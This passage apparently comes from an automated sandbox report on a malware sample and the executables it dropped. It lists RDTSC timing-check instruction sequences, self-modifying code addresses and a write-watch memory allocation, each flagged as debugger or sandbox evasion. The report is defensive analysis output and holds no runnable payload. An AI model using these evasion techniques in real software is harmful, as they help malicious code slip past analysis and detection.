Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C079D second address: 48C07A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C07A1 second address: 48C002B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FDB43188AD9h 0x00000011 xor eax, eax 0x00000013 jmp 00007FDAD10C436Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 mov edi, eax 0x00000022 cmp edi, 00000000h 0x00000025 setne al 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007FDAD10EAC37h 0x0000002e jmp 00007FDAD10EAD29h 0x00000033 call 00007FDAD4F523B0h 0x00000038 mov edi, edi 0x0000003a jmp 00007FDAD10EAC45h 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FDAD10EAC3Eh 0x00000045 push eax 0x00000046 pushad 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C002B second address: 48C00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FDAD0CA5E33h 0x0000000b sbb eax, 0E6F79EEh 0x00000011 jmp 00007FDAD0CA5E39h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FDAD0CA5E2Eh 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 call 00007FDAD0CA5E2Eh 0x00000026 mov edi, ecx 0x00000028 pop eax 0x00000029 call 00007FDAD0CA5E37h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00A1 second address: 48C00AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00AE second address: 48C00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00B2 second address: 48C00C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00C9 second address: 48C0116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDAD0CA5E2Ch 0x00000013 xor al, FFFFFFB8h 0x00000016 jmp 00007FDAD0CA5E2Bh 0x0000001b popfd 0x0000001c mov di, cx 0x0000001f popad 0x00000020 mov dword ptr [ebp-04h], 55534552h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0116 second address: 48C011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0C49 second address: 48C0C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDAD0CA5E36h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dh, 39h 0x00000013 mov cx, F6D9h 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDAD0CA5E2Bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0C92 second address: 48C0C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0EC3 second address: 48C0F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDAD0CA5E35h 0x0000000a sub al, 00000066h 0x0000000d jmp 00007FDAD0CA5E31h 0x00000012 popfd 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FDAD0CA5E30h 0x0000001a jmp 00007FDAD0CA5E35h 0x0000001f popfd 0x00000020 popad 0x00000021 add dword ptr [esp], 3942961Dh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d jmp 00007FDAD0CA5E39h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0F41 second address: 48C0F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0FDF second address: 48C0FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0AFF second address: 48D0B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDAD10EAC41h 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDAD10EAC49h 0x00000017 sbb cx, 3016h 0x0000001c jmp 00007FDAD10EAC41h 0x00000021 popfd 0x00000022 call 00007FDAD10EAC40h 0x00000027 pop edx 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0B66 second address: 48D0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0B6A second address: 48D0B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0B83 second address: 48D0BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5662h 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDAD0CA5E35h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDAD0CA5E2Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0BB6 second address: 48D0BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0BC6 second address: 48D0BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDAD0CA5E30h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0BEE second address: 48D0BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0BF2 second address: 48D0BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0BF8 second address: 48D0BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0BFE second address: 48D0C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FDAD0CA5E34h 0x0000000f je 00007FDB42D235C1h 0x00000015 pushad 0x00000016 mov edx, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov cx, A3CFh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0C2B second address: 48D0C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 cmp dword ptr [769B459Ch], 05h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0C41 second address: 48D0C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD0CA5E31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0C56 second address: 48D0C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FDB43180460h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov di, D6EEh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0C7D second address: 48D0C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD0CA5E31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0D1F second address: 48D0D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC49h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: D2EE6F second address: D2EE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDAD0CA5E26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB0F91 second address: EB0FB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FDAD10EAC45h 0x0000000e jnc 00007FDAD10EAC36h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB0FB6 second address: EB0FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB0FBC second address: EB0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EA952F second address: EA95A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAD0CA5E2Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c js 00007FDAD0CA5E3Dh 0x00000012 jmp 00007FDAD0CA5E35h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c jmp 00007FDAD0CA5E34h 0x00000021 jmp 00007FDAD0CA5E2Eh 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FDAD0CA5E37h 0x0000002e jnc 00007FDAD0CA5E26h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EAFFEB second address: EAFFF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDAD10EAC36h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EAFFF5 second address: EAFFFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB0141 second address: EB014B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB014B second address: EB0150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB031D second address: EB0329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDAD10EAC36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB0329 second address: EB0336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FDAD0CA5E2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB0497 second address: EB04B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDAD10EAC43h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB04B0 second address: EB04BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAD0CA5E2Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB05CE second address: EB05E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB05E3 second address: EB05EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FDAD0CA5E26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB05EE second address: EB05F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB2162 second address: EB21CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDAD0CA5E33h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FDAD0CA5E34h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jnl 00007FDAD0CA5E30h 0x00000023 mov eax, dword ptr [eax] 0x00000025 jnc 00007FDAD0CA5E2Eh 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f jo 00007FDAD0CA5E34h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB21CA second address: EB21CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB2395 second address: EB23C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDAD0CA5E26h 0x0000000a popad 0x0000000b jmp 00007FDAD0CA5E30h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 or dx, CF7Dh 0x0000001b push 66BD9844h 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB23C4 second address: EB23F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 66BD98C4h 0x0000000f mov dword ptr [ebp+122D27F8h], esi 0x00000015 push 00000003h 0x00000017 sub dh, 00000057h 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D3006h] 0x00000022 push 00000003h 0x00000024 mov edx, dword ptr [ebp+122D2A6Dh] 0x0000002a push 40352998h 0x0000002f pushad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB23F9 second address: EB240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDAD0CA5E2Dh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB240D second address: EB2489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 7FCAD668h 0x00000011 jo 00007FDAD10EAC4Dh 0x00000017 lea ebx, dword ptr [ebp+124570AFh] 0x0000001d call 00007FDAD10EAC3Dh 0x00000022 jnl 00007FDAD10EAC3Ch 0x00000028 pop edx 0x00000029 xchg eax, ebx 0x0000002a jns 00007FDAD10EAC3Ah 0x00000030 push eax 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 pop eax 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jns 00007FDAD10EAC48h 0x0000003d jmp 00007FDAD10EAC42h 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB2513 second address: EB2518 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB2518 second address: EB2539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D1A4Ah], edx 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D349Eh], edi 0x00000016 push 18D6BA7Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB2539 second address: EB259C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FDAD0CA5E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 18D6BAFAh 0x00000015 jmp 00007FDAD0CA5E2Ah 0x0000001a push 00000003h 0x0000001c jo 00007FDAD0CA5E29h 0x00000022 mov di, si 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D1BC7h], ebx 0x0000002d clc 0x0000002e push 00000003h 0x00000030 jnl 00007FDAD0CA5E2Ch 0x00000036 mov esi, 5ED4EF8Dh 0x0000003b push 6031262Ah 0x00000040 push eax 0x00000041 push edx 0x00000042 jnp 00007FDAD0CA5E36h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB259C second address: EB25ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FDAD10EAC36h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 5FCED9D6h 0x00000013 and ecx, dword ptr [ebp+122D2C65h] 0x00000019 pushad 0x0000001a mov si, 9338h 0x0000001e cmc 0x0000001f popad 0x00000020 lea ebx, dword ptr [ebp+124570BAh] 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FDAD10EAC38h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D332Ch], esi 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pop edx 0x0000004d rdtsc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe RDTSC instruction interceptor: First address: EB25ED second address: EB25F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A83CDF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C26E08 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C4EE87 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Special instruction interceptor: First address: D2EE8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Special instruction interceptor: First address: D2ED82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Special instruction interceptor: First address: D2C1F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Special instruction interceptor: First address: F00CCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Special instruction interceptor: First address: D2EDA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Special instruction interceptor: First address: F5D4EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Special instruction interceptor: First address: 701C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Special instruction interceptor: First address: 8ADBAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Special instruction interceptor: First address: 8D26EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46EE8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46ED82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46C1F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 640CCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46EDA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Special instruction interceptor: First address: 93E1EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Special instruction interceptor: First address: 939682 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Special instruction interceptor: First address: AE6ECD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 69D4EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Special instruction interceptor: First address: 773CDF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Special instruction interceptor: First address: 916E08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Special instruction interceptor: First address: 93EE87 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Special instruction interceptor: First address: 1171C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Special instruction interceptor: First address: 131DBAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Special instruction interceptor: First address: 13426EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Special instruction interceptor: First address: 13A9682 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Special instruction interceptor: First address: 94EE8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Special instruction interceptor: First address: 94ED82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Special instruction interceptor: First address: 94C1F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Special instruction interceptor: First address: B20CCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Special instruction interceptor: First address: 94EDA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Special instruction interceptor: First address: B7D4EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Special instruction interceptor: First address: 431C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Special instruction interceptor: First address: 5DDBAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Special instruction interceptor: First address: 6026EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Special instruction interceptor: First address: 669682 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Special instruction interceptor: First address: B5E1EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Special instruction interceptor: First address: D06ECD instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Memory allocated: 4F10000 memory reserve | memory write watch Jump to behavior
